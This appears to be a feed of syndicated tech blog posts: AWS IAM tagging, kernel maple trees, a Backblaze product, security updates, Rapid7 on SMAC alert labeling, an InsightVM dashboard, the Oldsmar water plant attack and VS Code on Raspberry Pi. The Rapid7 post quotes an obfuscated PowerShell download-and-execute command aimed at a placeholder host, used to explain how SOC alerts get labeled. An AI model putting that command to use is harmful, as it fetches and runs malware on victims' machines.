You can use tags to manage and secure access to IAM resources such as IAM roles, IAM users, SAML providers, server certificates, and virtual MFAs. In this post, I highlighted two examples of how AWS administrators can use tags to grant access at scale to IAM resources such as customer managed policies and instance profiles. For more information about the IAM resources that support tagging, see the AWS Identity and Access Management (IAM) User Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS IAM forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

 

Contributor

Special thanks to Derrick Oigiagbe who made significant contributions to this post.

[$] Introducing maple trees

Post Syndicated from original https://lwn.net/Articles/845507/rss

Seen from outside, the internals of the Linux kernel appear to be stable, especially in subsystems like the memory-management subsystem. However, from time to time, developers need to replace an internal interface to solve a longstanding problem. One such issue is contention on the lock used to protect essential memory-management structures, including the page tables and virtual memory areas (VMAs). Liam Howlett and Matthew Wilcox have been developing a new data structure, called a “maple tree”, to replace the data structures currently used for VMAs. This potentially big change in internal kernel structures has recently been posted for review in a massive patch set.

On-prem to Cloud, Faster: Meet Our Newest Fireball

Post Syndicated from Jeremy Milk original https://www.backblaze.com/blog/on-prem-to-cloud-faster-meet-our-newest-fireball/

We’re determined to make moving data into cloud storage as easy as possible for you, so today we are releasing the latest improvement to our data migration pathways: a bigger, faster Backblaze Fireball.

The new Fireball increases capacity for the rapid ingest service from 70TB to 96TB and connectivity speed from 1 Gb/s to 10 Gb/s so that businesses can move larger data sets and media libraries from on-premises to the Backblaze Storage Cloud faster than before.

What Hasn’t Changed

The service is still drop-dead simple. Data is secure and encrypted during the transfer process, and you gain the benefits of the cloud without having to navigate the constraints (and sluggishness) of internet bandwidth. We’re still happy to send you two, or three, or more Fireballs as needed—you can order whatever you need right from your Backblaze B2 Cloud Storage account. Easy.

How It Works

The customer favorite (of folks like Austin City Limits and Yoga International) service works like this: We ship you the Fireball, you copy on-premises data to it directly or through the transfer tool of your choice, you send the Fireball back to us, and we quickly upload your data into your B2 Cloud Storage account.

The Fireball is not right for everyone—organizations already storing to public clouds now frequently use our cloud to cloud migration solution, while those with small, local data sets often find internet transfer tools more than sufficient. For a refresher, definitely check out this “Pathways to the Cloud” guide.

Don’t Be Afraid to Ask

However you’d like to join us, we’re here to help. So—shameless plug alert—please don’t hesitate to contact our Sales team to talk about how to best start saving with B2 Cloud Storage.

The post On-prem to Cloud, Faster: Meet Our Newest Fireball appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/845999/rss

Security updates have been issued by Arch Linux (ansible, chromium, cups, docker, firefox, gitlab, glibc, helm, lib32-glibc, minio, nextcloud, opendoas, opera, php, php7, privoxy, python-django, python-jinja, python2-jinja, thunderbird, vivaldi, and wireshark-cli), Fedora (jasper, linux-firmware, php, python-cryptography, spice-vdagent, subversion, and thunderbird), Mageia (gssproxy and phpldapadmin), openSUSE (chromium, containerd, docker, docker-runc, librepo, nextcloud, and privoxy), SUSE (containerd, docker, docker-runc, golang-github-docker-libnetwork, kernel, openvswitch, and wpa_supplicant), and Ubuntu (wpa).

Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/


If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is often rendered useless because the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.
  • Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
[Figure: three example alert triage dropdown menus, each attempting to capture several of these categories in a single list]

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example, let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?

What if it’s not a threat?

However, what if upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]top command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.


A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting ourselves to only one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we have to now do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.


Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want answered:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.
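Put concretely, one way to picture the result is a single alert record that carries each SMAC category as its own field instead of one overloaded status value; a minimal sketch (field names and values are illustrative, not a prescribed schema):

{
    "alert_id": "2021-02-12-000123",
    "status": "CLOSED",
    "malice": "Malicious",
    "action": ["Sinkholed", "Informational"],
    "context": ["commodity", "obfuscated-powershell"],
    "comments": "C2 domain was sinkholed; no evidence of follow-on activity."
}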

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing?’” The machine learning (ML) model can only learn from the labels it is given. If the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.
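As a rough sketch of how you could quantify this effect, the snippet below trains a toy Malicious/Benign classifier on synthetic data and measures how held-out accuracy changes as the training labels are corrupted. It assumes scikit-learn and NumPy are available; the features and noise rates are made up for illustration, not drawn from any real SOC.

# Toy experiment: how does label noise in the Malice category hurt a model?
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Pretend each row is an alert; the target is Malicious (1) vs. Benign (0).
X, y = make_classification(n_samples=5000, n_features=20, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

def accuracy_with_label_noise(noise_rate: float) -> float:
    """Flip a fraction of the training labels, then score against clean test labels."""
    rng = np.random.default_rng(0)
    y_noisy = y_train.copy()
    flip = rng.random(len(y_noisy)) < noise_rate
    y_noisy[flip] = 1 - y_noisy[flip]
    model = LogisticRegression(max_iter=1000).fit(X_train, y_noisy)
    return model.score(X_test, y_test)

for rate in (0.0, 0.05, 0.15, 0.30):
    print(f"label noise {rate:.0%}: test accuracy {accuracy_with_label_noise(rate):.3f}")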

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefits of having statistically meaningful data outweigh the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for rules engines and automation. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing, but can be tailored to more complex combinations of labels.
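For example, a hypothetical rules engine keyed to label combinations might look like the sketch below. The label strings and dispositions are invented for illustration; the point is that separate Malice, Action, and Context labels support decisions that a single verdict field cannot express.

# Illustrative only: automated handling decisions keyed to SMAC label combinations.
def auto_disposition(malice: str, actions: set[str], context: set[str]) -> str:
    """Return an automated handling decision for a newly labeled alert."""
    if "red team" in context or "testing" in context:
        return "suppress_report"     # looks malicious, but it was an exercise
    if malice == "malicious" and "active_compromise" in actions:
        return "page_on_call"        # real and ongoing: escalate immediately
    if malice == "malicious" and "quarantined" in actions:
        return "ticket_only"         # real but already contained
    if malice == "benign" and "ignore" in actions:
        return "auto_close"          # normal usage, nothing to do
    return "analyst_review"          # anything else still gets human eyes

print(auto_disposition("malicious", {"quarantined"}, {"emotet"}))   # ticket_only
print(auto_disposition("malicious", {"active_compromise"}, set()))  # page_on_call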

Why should we care about this?

Imagine a world where SOC analysts don’t have to waste time reviewing obvious false positives or repetitive commodity malware. Imagine a world where SOC analysts only tackle the interesting questions: new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/02/12/new-insightvm-dashboard-helps-you-discover-significant-changes-in-your-environment-from-the-past-30-days/

Organizations are in a constant struggle to identify and reduce risk in their ever-changing environments. These changes can manifest in several ways and are often recurring events.

For example:

  1. Laptops and other devices are commissioned or decommissioned due to changes in the workforce.
  2. Your security tool discovers that assets in your environment contain several vulnerabilities recently disclosed by researchers.
  3. New software or services are deployed to your organization that introduce new risk via new vulnerabilities.
  4. Your IT team deployed a round of patches to local assets, which significantly decreased the number of vulnerabilities in your environment.

The obvious challenge here is that these changes create moving targets: security teams need to quickly identify, prioritize, and remediate risk as it is introduced. We developed the Significant Changes in the Last 30 Days dashboard in InsightVM to provide a lens on the differences between your environment 30 days ago and today, along with the ability to pivot the findings into a Remediation Project directly from the dashboard.

Users may easily create this dashboard by selecting the template titled “Significant Changes in the Last 30 days.” This action will create a local copy of the dashboard for you and save three new asset queries in your query library. These queries are:

  • Assets Discovered in the Last 30 Days
  • Critical Vulnerabilities Discovered in the Last 30 Days
  • Vulnerabilities Discovered in the Last 30 Days

These queries all filter the cards on the dashboard, and we’ve added the ability to view the queries applied to it, which allows you to further focus the findings on the dashboard.
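InsightVM builds and applies these queries for you, so no code is needed. Purely to illustrate what a “discovered in the last 30 days” filter does, here is a small hypothetical sketch (Python 3.9+) that applies the same idea to a CSV export of assets; the file name and column names are assumptions, not part of the product.

# Hypothetical illustration of a "last 30 days" filter over an asset export.
import csv
from datetime import datetime, timedelta

CUTOFF = datetime.now() - timedelta(days=30)

def assets_discovered_last_30_days(path: str) -> list[str]:
    """Return the IDs of assets whose first_discovered date falls in the window."""
    recent = []
    with open(path, newline="") as fh:
        for row in csv.DictReader(fh):
            if datetime.fromisoformat(row["first_discovered"]) >= CUTOFF:
                recent.append(row["asset_id"])
    return recent

# new_assets = assets_discovered_last_30_days("assets.csv")
# print(f"{len(new_assets)} assets discovered in the last 30 days")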

Users can add and remove cards as they wish; however, the following cards are included in the template:

This card shows the total number of assets in your environment, as well as the number of new assets discovered in the past 30 days and the percentage increase.

Number of Critical Vulnerabilities Found in the Last 30 Days

This is the total number of vulnerabilities with a severity of “critical” found within the last 30 days.

Number of Exploitable Critical Vulnerabilities Found in the Last 30 Days

This card shows all vulnerabilities with a severity of “critical” that have known exploits. It provides a powerful view into the vulnerabilities attackers could most easily exploit.

New vs. Remediated Vulnerabilities

This card shows the number and percentage of new, remediated, and unchanged vulnerability findings. This is powerful in showing which vulns in your environment have been addressed, which are new, and which have remained static.

Assets by Risk and Vulnerabilities Found in the Last 30 Days

This visualization helps you identify the riskiest assets in your environment based on the number of vulnerabilities and the associated risk score. The size of the bubbles indicates how many assets exist for a given vulnerability count and risk score range.
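As a rough illustration of this kind of view, the sketch below draws a comparable bubble chart with matplotlib from entirely made-up numbers (nothing here is pulled from InsightVM): vulnerability count on one axis, risk score on the other, and bubble size proportional to the number of assets in each bucket.

# Illustrative bubble chart with fabricated data, mimicking the dashboard card.
import matplotlib.pyplot as plt

vuln_counts = [5, 20, 40, 80, 150]                 # vulnerabilities per asset bucket
risk_scores = [2000, 9000, 15000, 30000, 60000]    # hypothetical risk scores
asset_counts = [120, 60, 25, 8, 2]                 # assets in each bucket

plt.scatter(vuln_counts, risk_scores, s=[a * 10 for a in asset_counts], alpha=0.5)
plt.xlabel("Vulnerabilities found in the last 30 days")
plt.ylabel("Risk score")
plt.title("Assets by risk and vulnerabilities (illustrative)")
plt.show()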

Vulnerabilities by CVSS Score

This card shows the vulnerabilities found in your environment in the past 30 days grouped by CVSS score range (e.g., CVSS 7.0–10).

Newly Discovered Vulnerabilities by Total Risk Score

This card allows users to leverage our Real Risk score in order to identify and prioritize vulnerabilities discovered in the past 30 days.

Assets With Actively Targeted Vulnerabilities

This card helps users identify vulnerabilities that are actively being targeted in the wild and therefore present a greater degree of risk.

Assets by Number of Running Containers

This card identifies risk exposure by showing container hosts and the total number of containers running on them.

Top Riskiest Assets

This card lists the riskiest assets discovered in the past 30 days, allowing teams to prioritize remediations that will help reduce risk quickly.

Most Common Software

This card shows the software most commonly used in your environment, allowing teams to focus their efforts on the items with the greatest surface area.

Most Common Services

This card shows the services most commonly deployed in your environment, giving teams insight into what could be most important.

New Vulnerability Findings

This card shows the total number of vulnerability findings discovered in the past 30 days; expanding the view shows a list of them. This allows teams to identify recent vulnerabilities and prioritize them accordingly.

Remediated Vulnerability Findings

Finally, some positive news. This card shows the vulnerabilities remediated in the past 30 days, allowing teams to demonstrate their progress on a monthly basis.

As usual, users can arrange cards however they like and share them with team members. We think this dashboard can provide deep visibility into changes in your environment, and we hope it will help drive customers toward a safer state.

Not an InsightVM customer? Watch this on-demand demo to see our vulnerability risk management solution in action.

Watch Now

Attack against Florida Water Treatment Facility

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/02/attack-against-florida-water-treatment-facility.html

A water treatment plant in Oldsmar, Florida, was attacked last Friday. The attacker took control of one of the systems, and increased the amount of sodium hydroxide — that’s lye — by a factor of 100. This could have been fatal to people living downstream, if an alert operator hadn’t noticed the change and reversed it.

We don’t know who is behind this attack. Despite its similarities to a Russian attack on a Ukrainian power plant in 2015, my bet is that it’s a disgruntled insider: either a current or former employee. It just doesn’t make sense for Russia to be behind this.

ArsTechnica is reporting on the poor cybersecurity at the plant:

The Florida water treatment facility whose computer system experienced a potentially hazardous computer breach last week used an unsupported version of Windows with no firewall and shared the same TeamViewer password among its employees, government officials have reported.

Brian Krebs points out that the fact that we know about this attack is what’s rare:

Spend a few minutes searching Twitter, Reddit or any number of other social media sites and you’ll find countless examples of researchers posting proof of being able to access so-called “human-machine interfaces” — basically web pages designed to interact remotely with various complex systems, such as those that monitor and/or control things like power, water, sewage and manufacturing plants.

And yet, there have been precious few known incidents of malicious hackers abusing this access to disrupt these complex systems. That is, until this past Monday, when Florida county sheriff Bob Gualtieri held a remarkably clear-headed and fact-filled news conference about an attempt to poison the water supply of Oldsmar, a town of around 15,000 not far from Tampa.

From the eco-protest in front of Dondukov 2: Raiffeisen and Revizoro against the environmentalists and the Kamchia Sands

Post Syndicated from Николай Марченко original https://bivol.bg/raiffeisen-%D0%B8-%D1%80%D0%B5%D0%B2%D0%B8%D0%B7%D0%BE%D1%80%D0%BE-%D1%81%D1%80%D0%B5%D1%89%D1%83-%D0%B5%D0%BA%D0%BE%D0%BB%D0%BE%D0%B7%D0%B8%D1%82%D0%B5-%D0%B8-%D0%BA%D0%B0%D0%BC%D1%87%D0%B8%D0%B9.html

Friday, 12 February 2021


Dozens of citizens and activists gathered under the windows of Prime Minister Boyko Borissov on Wednesday for an eco-protest in defense of the Kamchia Sands. The event was organized by the activists from “За да остане…

Visual Studio Code comes to Raspberry Pi

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/visual-studio-code-comes-to-raspberry-pi/

Microsoft’s Visual Studio Code is an excellent C development environment, and now it’s an easy install on Raspberry Pi. Here’s Jim Bennett from Microsoft to show you all how to get VS Code up and running on our tiny computer. Take it away, Jim…

There are a few products in the tech sphere that get me really excited. One of them is Raspberry Pi (obviously), and the other is Visual Studio Code or VS Code. I always hoped that the two would come together one day — and now, to my great pleasure, they have!

VS Code is a free, open source developer text editor originally released for Windows, macOS and x64 Linux. Out of the box it supports generic text editing and git source code control, as well as full web development with JavaScript, TypeScript and Node.js, with debugging, intellisense and all the goodness you’d expect from a full-featured IDE. What makes it super powerful is extensions — bringing a huge range of programming languages, developer tools and other capabilities.

For example, my VS Code setup includes a Python extension so I can code and debug in Python, a set of Microsoft Azure extensions so I can manage my cloud services, PlatformIO to let me program microcontrollers like Arduino boards, coupled with a C++ extension to support coding in C and C++, and even some Docker support. Not a bad setup for a completely free developer tool.

Jim’s Raspberry Pi 400 running VS Code

I’ve been hoping for years VS Code would come to Raspberry Pi, and finally it’s here. As well as supporting Debian Linux on x64, there are now builds for ARM and ARM64 – both of which can run on Raspberry Pi OS (the ARM build on Raspberry Pi OS, the ARM64 on the beta of the 64-bit Raspberry Pi OS). And yes — I am writing this right now on a Raspberry Pi 400 running VS Code!

Why am I so excited about this?

Well, there are a couple of reasons.

Firstly, it brings an exceptional developer tool to Raspberry Pi. There are already some great editors, but nothing of the calibre of VS Code. I can take my $35 computer, plug in a keyboard and mouse, connect a monitor or a TV, and code in a wide range of languages from the same place.

I see kids learning Python at school using one tool, then learning web development in an after-school coding club with a different tool. They can now do both in the same application, reducing the cognitive load – they only have to learn one tool, one debugger, one setup. Combine this with the new Raspberry Pi 400 and you have an all-in-one solution to learning to code, reminiscent of my ZX Spectrum of decades ago, but so much more powerful.

The second reason is to me the most important — it allows kids to share the same development environment as their grown-ups. Imagine the joy of a 10-year-old coding Python using VS Code on their Raspberry Pi plugged into the family TV, then seeing their Mum working from home coding Python in exactly the same tool on her work laptop as part of her job as an AI engineer or data scientist. It also makes it easier when Mum has to inevitably help with unblocking the issues that always come up with learners.

As a young child it was mind-blowing when my Dad brought home a work PC so he could write reports and I could use it to write up my school work – I was using what Dad used at work, making me feel important. I see this with my seven-year-old daughter, seeing her excitement that I use Microsoft Teams for work, the same as she uses for her virtual schooling (she’s even offered to teach me how to use it if I get stuck). To be able to bring that unadulterated joy of using ‘grown-up tools’ to our young learners is priceless.

Installing VS Code

The great news is VS Code is now available as part of the Raspberry Pi OS apt packages. Launch the Raspberry Pi Terminal and run the following commands:

sudo apt update 
sudo apt install code -y

This will download and install VS Code. If you’ve got your hands on a Pico, then you may not even need to do this – VS Code is installed as part of the Pico setup from the Getting Started guide.

After installing VS Code, you can run it from the Programming folder in the Raspberry Pi menu.

Getting started with VS Code

VS Code may seem daunting at first – it’s a powerful tool with a huge range of extensions. The good news is Microsoft has you covered with lots of hands-on, self-guided learning guides on how to use it with different languages and development tools, from using Git version control, to developing web applications — there’s even a guide to learning Python basics with Wonder Woman.
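If you want something to paste into the editor right away, the classic gpiozero blink script makes a nice first test on a Raspberry Pi. This assumes an LED is wired to GPIO 17 and that gpiozero is installed (it ships with Raspberry Pi OS):

# Blink an LED on GPIO 17: a tiny first program to try in VS Code on the Pi.
from gpiozero import LED
from signal import pause

led = LED(17)
led.blink()   # toggles the LED on and off in the background

pause()       # keep the script running so the blinking continues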

Go grab it and happy coding!

There he is – that’s the real life Jim!

Brilliant Jim Bennett shares loads of Raspberry Pi builds and tutorials over on Expecting Someone Geekier and tweets @jimbobbennett. He also works in Developer Relations at Microsoft. You can learn pretty much everything there is to know about him on GitHub.

The post Visual Studio Code comes to Raspberry Pi appeared first on Raspberry Pi.
